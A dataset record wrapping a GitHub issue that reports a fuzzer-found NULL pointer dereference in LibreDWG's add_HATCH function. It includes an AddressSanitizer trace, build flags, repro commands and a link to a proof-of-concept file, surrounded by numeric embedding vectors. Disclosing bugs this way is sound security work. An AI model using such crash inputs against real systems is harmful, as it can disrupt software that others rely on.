-0.0024054457899183035, -0.009885290637612343, 0.006301590707153082, 0.010148798115551472, 0.010118682868778706, 0.006327941082417965, 0.0027367123402655125, -0.010321959853172302, 0.005198623985052109, -0.003150795353576541, 0.003770037554204464, 0.004596321377903223, -0.01837022788822651, -0.008740915916860104, -0.009282988496124744, -0.01675906963646412, -0.00791274942457676, -0.011308230459690094, -0.017436658963561058, -0.024844979867339134, -0.000836165330838412, 0.008153670467436314, 0.0169096440076828, -0.003963903523981571, 0.02794683910906315, -0.008191314525902271, -0.0010474418522790074, -0.025326821953058243, -0.0022454592399299145, -0.009975636377930641, -0.02257128804922104, 0.012151454575359821, 0.013988477177917957, 0.01004339475184679, 0.0017824391834437847, 0.004152123350650072, -0.006124664098024368, 0.02409210242331028, -0.00035032365121878684, -0.007272803224623203, -0.0119933495298028, -0.010562880896031857, -0.006079491693526506, -0.020794495940208435, 0.012610710225999355, 0.017903443425893784, 0.006181130185723305, -0.02419750578701496, -0.004618907812982798, 0.022465884685516357, 0.008936664089560509, -0.003994018770754337, -0.019228508695960045, 0.0009189819684252143, 0.005360492970794439, 0.02853408455848694, 0.019002646207809448, -0.023881295695900917, 0.00664791464805603, 0.025326821953058243, -0.0007806405774317682, 0.0005114866071380675, -0.012685997411608696, -0.005936444737017155, 0.009267930872738361, 0.014748884364962578, -0.005217446014285088, -0.014251984655857086, 0.009132412262260914, 0.022857382893562317, 0.0024393254425376654, -0.004656551871448755, 0.00469043105840683, 0.016728954389691353, 0.017511947080492973, -0.011820187792181969, -0.01564480923116207, 0.038878630846738815, 0.023278994485735893, 0.011308230459690094, -0.012061108835041523, -0.0033691299613565207, 0.027781205251812935, 0.014093879610300064, -0.0022059332113713026, -0.009787417016923428, -0.018686436116695404, 0.01739148609340191, 0.006493574474006891, -0.011601853184401989, 0.01030690222978592, -0.0009345100843347609, 0.02951282635331154, 0.02345968410372734, -0.001865255762822926, -0.005612706765532494, 0.05712839961051941, -0.0124827204272151, 0.003751215524971485, -0.01823470927774906, 0.025326821953058243, -0.008808675222098827, 0.021291395649313927, -0.02154737338423729, -0.018249766901135445, -0.006444637198001146, 0.02311336062848568, 0.016533205285668373, 0.005808455403894186, -0.008755973540246487, -0.007592776790261269, 0.0066290926188230515, 0.017135508358478546, 0.005443309433758259, -0.008590340614318848, 0.000983447185717523, 0.00425376184284687, 0.0006281827227212489, 0.012121339328587055, 0.015178024768829346, -0.005168508738279343, -0.008025681599974632, -0.01510273665189743, 0.01680424064397812, 0.0041784741915762424, -0.031108926981687546, -0.007769702933728695, 0.0019292504293844104, -0.007302918471395969, 0.01334100216627121, 0.02037288434803486, 0.011767486110329628, -0.005514832679182291, 0.006154779344797134, 0.001586690777912736, 0.01363462395966053, -0.007325504906475544, -0.006779668387025595, 0.0062601822428405285, 0.04607614502310753, -0.007867577485740185, -0.00018045549222733825, -0.01124047115445137, 0.008868904784321785, 0.0008328715339303017, 0.0015217550098896027, -0.020402999594807625, 0.0035065303090959787, 0.008221429772675037, -0.002727301325649023, 0.015238254331052303, 0.018204594030976295, -0.002100530080497265, 0.020463230088353157, 0.0015349304303526878, 0.004536091350018978, -0.018686436116695404, -0.0058912718668580055, 0.004110714886337519 ]
135
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A null pointer deference was discovered in function add_HATCH in in_dxf.c. ASAN report: ``` ==733422==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000d0 (pc 0x000001afad89 bp 0x7fffffffbcb0 sp 0x7fffffffbb80 T0) ==733422==The signal is caused by a WRITE memory access. ==733422==Hint: address points to the zero page. #0 0x1afad89 in add_HATCH /src/libredwg/src/in_dxf.c:2806:50 #1 0x1a94216 in new_object /src/libredwg/src/in_dxf.c:10292:26 #2 0x1a7813c in dxf_entities_read /src/libredwg/src/in_dxf.c:12247:18 #3 0x1a6d0d2 in dwg_read_dxf /src/libredwg/src/in_dxf.c:12830:23 #4 0x4cb82a in dxf_read_file /src/libredwg/src/dwg.c:381:13 #5 0x4c91c4 in main /src/libredwg/programs/dxf2dwg.c:312:15 #6 0x7ffff7c580b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c40d in _start (/mnt/disk/out/libredwg/programs_asan/dxf2dwg+0x41c40d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/libredwg/src/in_dxf.c:2806:50 in add_HATCH ==733422==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64276.zip dxf2dwg ./tests_64276 -o /dev/null ``` POC file : [tests_64276.zip](https://github.com/LibreDWG/libredwg/files/6652511/tests_64276.zip)
NULL pointer dereference in function add_HATCH in in_dxf.c
https://api.github.com/repos/LibreDWG/libredwg/issues/380/comments
0
2021-06-15T03:15:00
2021-06-27T06:36:33Z
https://github.com/LibreDWG/libredwg/issues/380
920,944,138
380
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : NULL pointer dereference in function add_HATCH in in_dxf.c Issue date: --- start body --- ## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A null pointer deference was discovered in function add_HATCH in in_dxf.c. ASAN report: ``` ==733422==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000d0 (pc 0x000001afad89 bp 0x7fffffffbcb0 sp 0x7fffffffbb80 T0) ==733422==The signal is caused by a WRITE memory access. ==733422==Hint: address points to the zero page. #0 0x1afad89 in add_HATCH /src/libredwg/src/in_dxf.c:2806:50 #1 0x1a94216 in new_object /src/libredwg/src/in_dxf.c:10292:26 #2 0x1a7813c in dxf_entities_read /src/libredwg/src/in_dxf.c:12247:18 #3 0x1a6d0d2 in dwg_read_dxf /src/libredwg/src/in_dxf.c:12830:23 #4 0x4cb82a in dxf_read_file /src/libredwg/src/dwg.c:381:13 #5 0x4c91c4 in main /src/libredwg/programs/dxf2dwg.c:312:15 #6 0x7ffff7c580b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c40d in _start (/mnt/disk/out/libredwg/programs_asan/dxf2dwg+0x41c40d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/libredwg/src/in_dxf.c:2806:50 in add_HATCH ==733422==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64276.zip dxf2dwg ./tests_64276 -o /dev/null ``` POC file : [tests_64276.zip](https://github.com/LibreDWG/libredwg/files/6652511/tests_64276.zip) --- end body ---
1,780
[ -0.0313158817589283, 0.02648216299712658, 0.001711081014946103, 0.002125940751284361, 0.04968676343560219, 0.01711769588291645, -0.009722520597279072, 0.042525697499513626, 0.012022323906421661, -0.014377212151885033, -0.028616711497306824, -0.014790349639952183, 0.007470916956663132, 0.01165049895644188, -0.002544243121519685, 0.03310614824295044, -0.028396369889378548, 0.012896799482405186, -0.004788961261510849, -0.025531945750117302, 0.0344281904399395, -0.014556238427758217, -0.027170727029442787, 0.03354682773351669, 0.006954494398087263, 0.009405781514942646, -0.01397095900028944, -0.0018780577229335904, 0.004169253632426262, 0.003897271119058132, -0.023397397249937057, 0.01761346124112606, 0.0112580182030797, -0.006885637994855642, 0.066322460770607, 0.0034841326996684074, 0.030351892113685608, 0.03354682773351669, -0.0009932533139362931, 0.04505961388349533, -0.009984174743294716, -0.0626317635178566, -0.028781965374946594, -0.009212983772158623, -0.018453508615493774, 0.004238110035657883, 0.01830202527344227, 0.01768231764435768, -0.0329684354364872, 0.04555537924170494, -0.0012488826178014278, -0.013647334650158882, -0.014459839090704918, -0.04935625195503235, 0.012187578715384007, -0.006321015767753124, 0.029883667826652527, 0.05469950661063194, -0.02006474882364273, 0.009825805202126503, -0.034510817378759384, 0.03566760569810867, 0.020037205889821053, 0.014528695493936539, -0.012442347593605518, 0.01312402542680502, -0.03671422228217125, 0.012931227684020996, -0.018825333565473557, -0.005749507807195187, -0.0007987339631654322, -0.0313158817589283, 0.003473804332315922, 0.023053115233778954, 0.020216232165694237, -0.03833923116326332, 0.013316823169589043, 0.03720998764038086, -0.018976818770170212, 0.026344450190663338, -0.03508920967578888, 0.021111365407705307, -0.035006582736968994, 0.012821057811379433, -0.007216148544102907, 0.008524419739842415, -0.0071059782058000565, -0.06610212475061417, -0.031012913212180138, -0.039578646421432495, -0.009791377000510693, 0.006524141877889633, 0.03126079589128494, -0.022791462019085884, 0.009942861273884773, -0.02261243388056755, -0.025118807330727577, -0.012841714546084404, -0.042525697499513626, -0.013881445862352848, -0.049907103180885315, 0.006097232457250357, 0.012166921980679035, 0.03977144509553909, 0.025683429092168808, 0.012063637375831604, 0.02261243388056755, -0.0020519201643764973, 0.016897356137633324, 0.11997535079717636, -0.019968349486589432, -0.02737729623913765, -0.02850653976202011, -0.005147014278918505, -0.010865536518394947, 0.02039525844156742, 0.01596090942621231, 0.013716190122067928, -0.032720550894737244, -0.01704883947968483, -0.027074327692389488, -0.022832775488495827, -0.008248994126915932, -0.0014468446606770158, 0.0021758615039288998, 0.00291262473911047, -0.007505345158278942, 0.0008985757594928145, -0.041396453976631165, -0.004603048786520958, -0.0007307383348233998, -0.05021006986498833, 0.0204228013753891, -0.004933559335768223, 0.034318018704652786, 0.01827448233962059, -0.026179194450378418, 0.005797707010060549, 0.016608158126473427, 0.003258628072217107, -0.0829581618309021, -0.04183713719248772, 0.0017661660676822066, -0.023879392072558403, -0.01704883947968483, -0.0021173337008804083, -0.006152317393571138, -0.020767083391547203, 0.001864286488853395, -0.018976818770170212, -0.023452483117580414, 0.014335897751152515, 0.024223674088716507, 0.018976818770170212, 0.049411337822675705, 0.004923230968415737, -0.0063279010355472565, 0.02532537654042244, -0.02711564116179943, -0.008496876806020737, 0.031233252957463264, -0.01747574843466282, -0.010452398099005222, -0.04362739995121956, -0.03949601948261261, 0.016360275447368622, -0.00872410275042057, 0.04164433851838112, -0.01491429191082716, 0.03164639323949814, 0.0006812477950006723, -0.0005052336491644382, 0.004286309704184532, 0.014390982687473297, -0.05916139855980873, 0.003659716574475169, -0.030709944665431976, 0.021510733291506767, 0.0010870700934901834, -0.02681267447769642, -0.015354972332715988, -0.01312402542680502, -0.01907321624457836, 0.01615370623767376, 0.011629842221736908, -0.0340425930917263, 0.02270883321762085, -0.019348641857504845, -0.008992643095552921, -0.010934392921626568, -0.02834128588438034, -0.01466640830039978, -0.008269650861620903, -0.008200794458389282, 0.009956632740795612, -0.018494823947548866, -0.04233290255069733, -0.008882473222911358, -0.004214010201394558, -0.0030778800137341022, 0.010300913825631142, 0.01596090942621231, -0.0050437296740710735, 0.0019796208944171667, -0.010307800024747849, 0.004186467733234167, -0.021992728114128113, 0.029635785147547722, 0.012456119060516357, -0.022860318422317505, -0.006537913344800472, -0.01952766813337803, 0.004000555723905563, 0.010066802613437176, -0.004244995769113302, 0.02685398794710636, 0.004592720419168472, 0.0034996254835277796, -0.014928062446415424, -0.007801427505910397, 0.03952356055378914, -0.018618764355778694, 0.009991060942411423, 0.010748480446636677, -0.052716441452503204, 0.026537248864769936, 0.02985612489283085, 0.007980454713106155, -0.04585834965109825, -0.016236333176493645, 0.030902743339538574, -0.04233290255069733, 0.017200322821736336, 0.011898382566869259, 0.003604631405323744, 0.0076706004329025745, 0.002492600819095969, 0.010714052245020866, -0.02221306785941124, -0.022502264007925987, 0.0090201860293746, 0.021496960893273354, -0.012222006916999817, -0.016663243994116783, -0.000027273581508779898, 0.043517231941223145, -0.020780855789780617, -0.007849627174437046, 0.00364938797429204, 0.0063416725024580956, 0.027322210371494293, -0.013757504522800446, 0.027198269963264465, 0.012277091853320599, 0.022653749212622643, -0.007890940643846989, 0.0032672351226210594, 0.02506372146308422, -0.03806380555033684, -0.01903190277516842, 0.04131382703781128, 0.007223034277558327, -0.015299887396395206, 0.03555743396282196, -0.011547214351594448, 0.002306688576936722, -0.0391930490732193, -0.0031760004349052906, 0.008827387355268002, -0.005336369387805462, 0.03886254131793976, -0.03685193508863449, -0.010679624043405056, -0.031894274055957794, 0.0015389400068670511, -0.00044541468378156424, 0.01266268827021122, -0.016566844657063484, 0.009068384766578674, -0.0038903853856027126, -0.015024461783468723, -0.005732293706387281, -0.014886748977005482, 0.04902574047446251, 0.05866563320159912, -0.028616711497306824, -0.018549907952547073, 0.009392010048031807, -0.001168837072327733, -0.005456868093460798, 0.008166366256773472, 0.016346504911780357, -0.055828750133514404, -0.0004931837902404368, 0.013454535976052284, 0.03572268784046173, 0.009281840175390244, -0.01702129654586315, -0.013729961588978767, -0.02263997681438923, 0.003215592820197344, -0.017861343920230865, -0.014115558005869389, -0.0016757921548560262, -0.0035323321353644133, 0.002277424791827798, -0.01476280763745308, -0.008173252455890179, -0.011526557616889477, -0.009295610710978508, 0.056792739778757095, -0.035171836614608765, -0.0064277430064976215, -0.014859206043183804, -0.014776579104363918, -0.02768026478588581, 0.010142544284462929, -0.02168975956737995, 0.022722605615854263, 0.010762251913547516, -0.05637960135936737, -0.015905823558568954, -0.042387984693050385, -0.012194464914500713, 0.03393242508172989, -0.032830722630023956, -0.022102897986769676, 0.04847488924860954, -0.08328867703676224, 0.023562652990221977, 0.011127190664410591, -0.030214179307222366, -0.021235307678580284, -0.013165339827537537, -0.010996364057064056, -0.03134342283010483, 0.012704001739621162, -0.004713219124823809, 0.005756393074989319, -0.0007031957502476871, -0.024306301027536392, 0.020106062293052673, -0.006524141877889633, -0.020546743646264076, 0.004930116701871157, -0.009874004870653152, 0.02886459417641163, 0.017957743257284164, -0.0009674321045167744, 0.005267512984573841, 0.0008086321176961064, 0.0346209853887558, 0.0022034042049199343, -0.009460866451263428, -0.011492129415273666, -0.01879779063165188, -0.007808313239365816, -0.022653749212622643, 0.0010380098829045892, 0.004596163053065538, 0.05067829415202141, -0.04930116608738899, 0.027983231469988823, -0.0007186884758993983, -0.01090684998780489, 0.03707227483391762, 0.010803565382957458, -0.012511203996837139, -0.03814643248915672, -0.0058631207793951035, -0.044508762657642365, 0.03313368931412697, 0.002489158185198903, -0.02834128588438034, -0.01658061519265175, -0.03492395579814911, 0.02221306785941124, 0.031012913212180138, -0.03244512528181076, 0.0027886833995580673, 0.005295055452734232, -0.004055640660226345, -0.015368743799626827, -0.042718496173620224, 0.05954699590802193, 0.04021212458610535, -0.010555682703852654, 0.03814643248915672, -0.018412195146083832, -0.03379471227526665, -0.001129244570620358, 0.026027711108326912, -0.017723631113767624, -0.025614572688937187, 0.03230741247534752, 0.0439579114317894, 0.0074089462868869305, 0.014859206043183804, 0.020684456452727318, -0.043021466583013535, -0.00888935849070549, 0.014239499345421791, 0.0044377935118973255, 0.008476220071315765, 0.00741583202034235, 0.02393447794020176, 0.030902743339538574, 0.010631424374878407, 0.016635701060295105, -0.006527584511786699, 0.0022464394569396973, -0.010720938444137573, -0.0225160364061594, 0.010101230815052986, 0.023149514570832253, 0.04247061535716057, -0.005925091449171305, -0.00811128132045269, -0.05200033634901047, 0.023424940183758736, 0.014115558005869389, -0.01688358373939991, -0.007553544826805592, 0.01674587093293667, 0.020367717370390892, -0.0028351612854748964, -0.023287227377295494, 0.03927567973732948, 0.04723547399044037, -0.040074411779642105, -0.016442902386188507, 0.01122359000146389, 0.005219313316047192, 0.030709944665431976, -0.029553158208727837, -0.02376922219991684, -0.009109699167311192, -0.04147908091545105, 0.021799929440021515, 0.00504717230796814, 0.002869589487090707, -0.0038559571839869022, -0.04131382703781128, -0.013000084087252617, 0.03299597650766373, -0.026234280318021774, -0.03833923116326332, -0.0097018638625741, 0.016635701060295105, -0.028947221115231514, -0.02164844609797001, 0.025022407993674278, 0.005973290652036667, -0.013785046525299549, -0.004613377153873444, -0.012263321317732334, 0.010748480446636677, 0.004262209869921207, 0.005381125956773758, -0.011381959542632103, -0.007443374488502741, 0.022199297323822975, -0.03872482851147652, -0.04120365530252457, 0.01256628893315792, 0.03376716747879982, 0.02787306159734726, -0.007285004947334528, -0.011450815945863724, -0.009109699167311192, -0.01724163629114628, 0.02919510379433632, -0.0036149597726762295, 0.019293557852506638, 0.013172225095331669, 0.04260832816362381, -0.028781965374946594, -0.011443929746747017, -0.01557531300932169, -0.02671627514064312, -0.005973290652036667, -0.009495294652879238, 0.00045445209252648056, 0.006568898446857929, 0.010665852576494217, 0.010369770228862762, 0.028478998690843582, 0.0023256242275238037, -0.023727908730506897, 0.016291419044137, 0.015768110752105713, 0.009571036323904991, 0.004830274730920792, -0.05445162579417229, -0.005773607175797224, 0.025284063071012497, -0.0007229920011013746, -0.02393447794020176, 0.045968517661094666, 0.02112513780593872, 0.021565817296504974, -0.004658134188503027, 0.033326487988233566, -0.017255408689379692, 0.02579359896481037, -0.009612350724637508, -0.04021212458610535, 0.01324108149856329, -0.004637476988136768, -0.03051714599132538, 0.017737403512001038, -0.03373962640762329, 0.001095677143894136, -0.045472752302885056, 0.015368743799626827, -0.010844879783689976, 0.019445041194558144, -0.00555326696485281, -0.004065969027578831, 0.010108116082847118, 0.002148319035768509, -0.03448327258229256, -0.011030792258679867, 0.01254563219845295, -0.011051448993384838, 0.014872977510094643, 0.032693009823560715, -0.0030124664772301912, 0.035144295543432236, -0.021138908341526985, 0.014693951234221458, -0.014198184944689274, 0.005491296295076609, 0.042525697499513626, -0.0003890385269187391, 0.019624067470431328, -0.00044068082934245467, 0.019982121884822845, 0.013798817992210388, -0.0042208959348499775, 0.009089041501283646, 0.043654944747686386, -0.018357111141085625, -0.005715079605579376, -0.0027921260334551334, 0.02374167926609516, -0.022268151864409447, 0.021510733291506767, -0.009929089806973934, -0.010383541695773602, 0.0038249718490988016, -0.010837993584573269, -0.0065895551815629005, -0.013137796893715858, -0.006689397152513266, 0.01900435984134674, -0.035171836614608765, -0.005780492909252644, 0.025366690009832382, 0.004530749749392271, 0.022750146687030792, -0.010899964720010757, 0.021441876888275146, -0.033822253346443176, -0.004665019456297159, -0.0037423442117869854, -0.0029832026921212673, 0.031398508697748184, -0.032059527933597565, -0.00512291444465518, 0.022956715896725655, -0.0003608504484873265, 0.027060557156801224, -0.004926674067974091, -0.007264347746968269, -0.00364938797429204, -0.033849794417619705, -0.022722605615854263, -0.000217865890590474, -0.042718496173620224, 0.0195001270622015, -0.029938753694295883, 0.0012445790925994515, 0.010183858685195446, 0.019389955326914787, -0.030902743339538574, 0.005925091449171305, -0.015244802460074425, 0.024278758093714714, -0.013847017660737038, -0.007257462479174137, 0.00450320728123188, 0.0173104926943779, 0.006885637994855642, 0.004837160464376211, 0.0065551274456083775, -0.0009114863350987434, 0.009102812968194485, -0.029112476855516434, -0.009171669371426105, -0.004940445069223642, 0.00822833739221096, -0.010831108316779137, -0.03098537027835846, -0.01612616330385208, 0.00958480779081583, 0.032720550894737244, -0.015286115929484367, -0.021111365407705307, 0.012993198819458485, 0.005350140389055014, 0.023424940183758736, 0.04930116608738899, 0.0051298001781105995, 0.012841714546084404, -0.008007996715605259, 0.013447650708258152, 0.03250021114945412, -0.01579565368592739, 0.02009229175746441, 0.02277768962085247, -0.024912238121032715, 0.01418441440910101, 0.025118807330727577, 0.0033860125113278627, 0.023135744035243988, -0.012146265245974064, 0.021042509004473686, -0.012352834455668926, 0.012394147925078869, -0.03610828518867493, 0.0194037277251482, 0.008999528363347054, -0.023714136332273483, -0.022006498649716377, 0.03216969966888428, 0.025642115622758865, 0.016828499734401703, -0.018095456063747406, 0.009474637918174267, 0.00007665651355637237, 0.010548797436058521, -0.006307244300842285, 0.0002569203497841954, -0.03541972115635872, 0.012848599813878536, 0.03211461380124092, -0.005732293706387281, 0.033023517578840256, 0.02419613115489483, -0.039578646421432495, -0.010232057422399521, 0.005016187205910683, 0.008441791869699955, 0.03897270932793617, -0.01410178653895855, 0.021896328777074814, 0.05899614468216896, -0.011554100550711155, 0.00025735070812515914, 0.007691257633268833, -0.061364803463220596, -0.04346214607357979, 0.010803565382957458, 0.012256435118615627, -0.004537635482847691, -0.036466337740421295, -0.01549268513917923, 0.02204781211912632, 0.011099648661911488, -0.004937002435326576, -0.0010887915268540382, -0.007987339980900288, -0.0046099345199763775, -0.001020795782096684, -0.014046701602637768, 0.0023514453787356615, 0.03310614824295044, -0.03833923116326332, 0.00043637730414047837, 0.033216316252946854, 0.006145431660115719, 0.008827387355268002, 0.0062108454294502735, -0.011526557616889477, 0.00555326696485281, -0.013826360926032066, -0.009949746541678905, -0.023920705541968346, -0.03200444579124451, 0.006369214970618486, -0.01625010557472706, -0.010170087218284607, -0.004599606152623892, 0.020973652601242065, -0.03602565824985504, 0.05734359100461006, -0.02516012080013752, -0.03357436880469322, -0.014928062446415424, -0.018288254737854004, 0.007112863939255476, 0.031563762575387955, -0.019417498260736465, 0.008717217482626438, 0.02370036579668522, -0.005054058041423559, -0.0031278009992092848, 0.023562652990221977, -0.023755449801683426, -0.02930527552962303, -0.0007634451030753553, -0.024127274751663208, 0.005783936008810997, 0.018329568207263947, -0.018728934228420258, -0.009109699167311192, 0.02522897720336914, 0.0021328262519091368, 0.003251742571592331, -0.04492190107703209, -0.013736847788095474, 0.010156315751373768, -0.025738514959812164, 0.032693009823560715, -0.00897198636084795, 0.015451371669769287, -0.024884695187211037, 0.006448399741202593, 0.020505430176854134, -0.0013581920647993684, -0.020381487905979156, 0.02774912118911743, 0.02582114189863205, -0.017420664429664612, -0.03930322080850601, 0.04544521123170853, -0.003420440712943673, -0.01410178653895855, 0.003318877425044775, 0.006493156310170889, -0.02999383769929409, 0.00880673062056303, -0.02482960931956768, 0.0006231502047739923, 0.011519672349095345, 0.00480961799621582, -0.012524975463747978, 0.013833246193826199, 0.006245273631066084, 0.016897356137633324, -0.004665019456297159, 0.011409501545131207, -0.03128833696246147, -0.0209598820656538, -0.01242857612669468, 0.031178168952465057, -0.029387902468442917, -0.014039815403521061, -0.017324265092611313, -0.01258006040006876, 0.0265510194003582, -0.004627148620784283, 0.022102897986769676, 0.024512870237231255, -0.03082011453807354, 0.0218825563788414, -0.011526557616889477, 0.020615600049495697, 0.01332370936870575, 0.009488409385085106, 0.01671832799911499, 0.013964073732495308, 0.00013599134399555624, 0.025366690009832382, -0.03927567973732948, 0.02436138689517975, 0.02980104088783264, 0.03299597650766373, 0.03247266635298729, -0.024650583043694496, -0.025187663733959198, -0.014253269881010056, 0.01385390292853117, 0.0117193553596735, 0.01867385022342205, -0.0034169978462159634, -0.01900435984134674, 0.011560985818505287, -0.028974764049053192, -0.01324108149856329, -0.006114446558058262, 0.028892137110233307, -0.009240525774657726, 0.007918483577668667, -0.01801282912492752, -0.0008916900842450559, 0.01834333874285221, 0.0004682233848143369, -0.020670684054493904, 0.0036734878085553646, -0.006055918522179127, -0.008641475811600685, -0.03751295432448387, -0.009226754307746887, -0.009047728031873703, -0.02006474882364273, 0.03949601948261261, -0.014156871475279331, 0.011368188075721264, -0.012022323906421661, -0.003924813587218523, 0.01207052357494831, 0.036135826259851456, -0.0014924620045349002, -0.01976178027689457, 0.02039525844156742, -0.016566844657063484, 0.004482550080865622, 0.011244246736168861, -0.02575228549540043, -0.0031209152657538652, -0.009336925111711025, -0.06230125203728676, -0.016071079298853874, -0.0006433767848648131, 0.026082796975970268, 0.023810535669326782, 0.015974679961800575, 0.023686593398451805, -0.020202461630105972, -0.003966127522289753, 0.005009301472455263, -0.023975791409611702, -0.01598845049738884, 0.015616626478731632, 0.017792487516999245, 0.027088100090622902, -0.013234196230769157, 0.026537248864769936, -0.0075397733598947525, -0.02463681250810623, -0.022929174825549126, -0.013461422175168991, -0.024182360619306564, -0.0035702032037079334, -0.024347614496946335, -0.003707916010171175, 0.002730155363678932, 0.02624805085361004, 0.03478624299168587, 0.027033014222979546, -0.015148403123021126, 0.02367282286286354, 0.00516422837972641, 0.0033378128428012133, 0.006785796023905277, 0.013082711957395077, 0.025146350264549255, -0.0140535868704319, 0.04393037036061287, -0.0023514453787356615, 0.006641197483986616, 0.01097570639103651, 0.01491429191082716, 0.02162090316414833, 0.004241553135216236, -0.018591221421957016, 0.0180403720587492, 0.00698547950014472, -0.019968349486589432, -0.01820562593638897, 0.02237832359969616, -0.007161063142120838, -0.0007612933404743671, -0.045638006180524826, -0.0014313519932329655, -0.008324735797941685, 0.02162090316414833, 0.020711999386548996, -0.008875587023794651, 0.002647527726367116, -0.030214179307222366, 0.02737729623913765, 0.013895217329263687, -0.04640920087695122, 0.012201350182294846, -0.030572231858968735, -0.009281840175390244, -0.026399536058306694, -0.0101632010191679, 0.02065691351890564, -0.03866974264383316, -0.01883910596370697, 0.0362735390663147, 0.03853202983736992, -0.003014188027009368, -0.011912153102457523, -0.023121971637010574, 0.01107210572808981, -0.0018470723880454898, 0.0031105868984013796, 0.014294584281742573, 0.00804242491722107, 0.0028454898856580257, -0.003921370953321457, 0.025697199627757072, 0.007622401230037212, -0.006840881425887346, 0.02774912118911743, 0.022268151864409447, 0.0038146432489156723, -0.003497903933748603, -0.029112476855516434, -0.02930527552962303, 0.015671711415052414, -0.01541005726903677, -0.0035529891029000282, 0.006493156310170889, 0.019252242520451546, -0.0007673182408325374, 0.014115558005869389, -0.005274398718029261, -0.013433879241347313, 0.017558377236127853, -0.018522365018725395, -0.02336985431611538, 0.025903768837451935, 0.00182469398714602, 0.008765417151153088, -0.010603882372379303, 0.008558847941458225, 0.002971152774989605, 0.014446068555116653, 0.018963046371936798, -0.01827448233962059, -0.03225232660770416, -0.008400478400290012, -0.027556322515010834, -0.0360807441174984, -0.01019762922078371, 0.04296638071537018, 0.0006971708498895168, -0.01598845049738884, -0.0077256858348846436, -0.00438615120947361, -0.00966743566095829, -0.011044562794268131, 0.0037698866799473763, -0.00037634314503520727, 0.005890663247555494, 0.001497626188211143, -0.011230475269258022, -0.020505430176854134, -0.03134342283010483, 0.021731073036789894, -0.010142544284462929, -0.005370797589421272, 0.001365077681839466, 0.007532887626439333, 0.015162174589931965, 0.023218370974063873, -0.012194464914500713, -0.011120305396616459, 0.01631896197795868, 0.017503291368484497, -0.006472499575465918, -0.013365022838115692, -0.008338507264852524, 0.000308562652207911, 0.00019086127576883882, 0.036438796669244766, 0.01936241425573826, 0.016773413866758347, -0.012938113883137703, 0.0209598820656538, -0.009639892727136612, -0.015644168481230736, -0.0069338371977210045, 0.031866732984781265, -0.015354972332715988, 0.014418525621294975, 0.02690907195210457, -0.023562652990221977, -0.008682789281010628, -0.008786073885858059, -0.004947330802679062, 0.03065485879778862, -0.003528889501467347, -0.005704750772565603, -0.02631690725684166, 0.012098065577447414, 0.00147352647036314, -0.0388074554502964, 0.005057501140981913, 0.016167476773262024, 0.0070646642707288265, -0.001499347621574998, -0.004152039531618357, 0.0010225172154605389, -0.009109699167311192, -0.00734008988365531, 0.032720550894737244, -0.015974679961800575, -0.026261823251843452, 0.010948164388537407, -0.009646778926253319, 0.030214179307222366, -0.00888935849070549, -0.020119834691286087, -0.019114529713988304, 0.03291334956884384, 0.025049950927495956, -0.01721409521996975, -0.02522897720336914, -0.016732100397348404, -0.01867385022342205, 0.021276621147990227, 0.005656551569700241, 0.02258489280939102, -0.01031468529254198, 0.022667519748210907, -0.005487853195518255, -0.015768110752105713, -0.003663159441202879, 0.01105833426117897, 0.011492129415273666, -0.012469890527427197, 0.021014966070652008, 0.006575784180313349, -0.0038284147158265114, -0.0003526737564243376, -0.005401782691478729, -0.011388844810426235, -0.01737934909760952, -0.034318018704652786, 0.02456795610487461, -0.01165049895644188, -0.013130911625921726, 0.03437310457229614, 0.03115062601864338, 0.003399783745408058, -0.044976986944675446, -0.00528128445148468, 0.004210567567497492, 0.0346209853887558, 0.022130440920591354, -0.020243775099515915, -0.011705583892762661, -0.01919715851545334, 0.020711999386548996, -0.004623705986887217, 0.06461482495069504, 0.010583225637674332, -0.016511758789420128, -0.0037630011793226004, -0.014294584281742573, -0.021359248086810112, 0.0033533056266605854, -0.04577571898698807, -0.015134631656110287, -0.022488493472337723, 0.0011662548640742898, -0.025779828429222107, -0.01952766813337803, -0.006620540749281645, -0.019541440531611443, -0.0010035816812887788, -0.003563317470252514, -0.0003642932861112058, 0.025215206667780876, 0.033216316252946854, -0.028231116011738777, -0.007732571102678776, 0.04420579597353935, -0.0032035429030656815, 0.007209262810647488, 0.010424856096506119, -0.04112102836370468, -0.005697865504771471, -0.0064690569415688515, 0.008441791869699955, -0.013213538564741611, 0.01491429191082716, -0.044343508780002594, 0.01907321624457836, 0.01843973807990551, -0.0067169396206736565, 0.0034393761307001114, -0.009653664194047451, -0.021965185180306435, -0.02449909970164299, 0.010514369234442711, 0.003821528982371092, -0.0028730323538184166, -0.010831108316779137, 0.02091856859624386, 0.06599195301532745, -0.010982592590153217, -0.003146736416965723, -0.004792403895407915, 0.017269179224967957, -0.00002650701571837999, 0.010899964720010757, 0.003663159441202879, -0.038449402898550034, -0.002847211202606559, 0.00822833739221096, 0.00048027324373833835, -0.002800733083859086, 0.03836677223443985, 0.01764100417494774, -0.00469944765791297, -0.005573923699557781, -0.024072190746665, 0.028162259608507156, -0.009178555570542812, -0.0066446405835449696, -0.004255324136465788, -0.0016336175613105297, -0.03263792395591736, 0.023480024188756943, -0.0030916514806449413, 0.0015690646832808852, -0.007649943698197603, -0.030076466500759125, -0.005415554158389568, -0.003508232533931732, 0.01976178027689457, -0.002494322368875146, -0.014198184944689274, -0.0025511288549751043, -0.0016430853866040707, 0.01417064294219017, -0.012394147925078869, -0.010225172154605389, -0.014308355748653412, -0.009984174743294716, 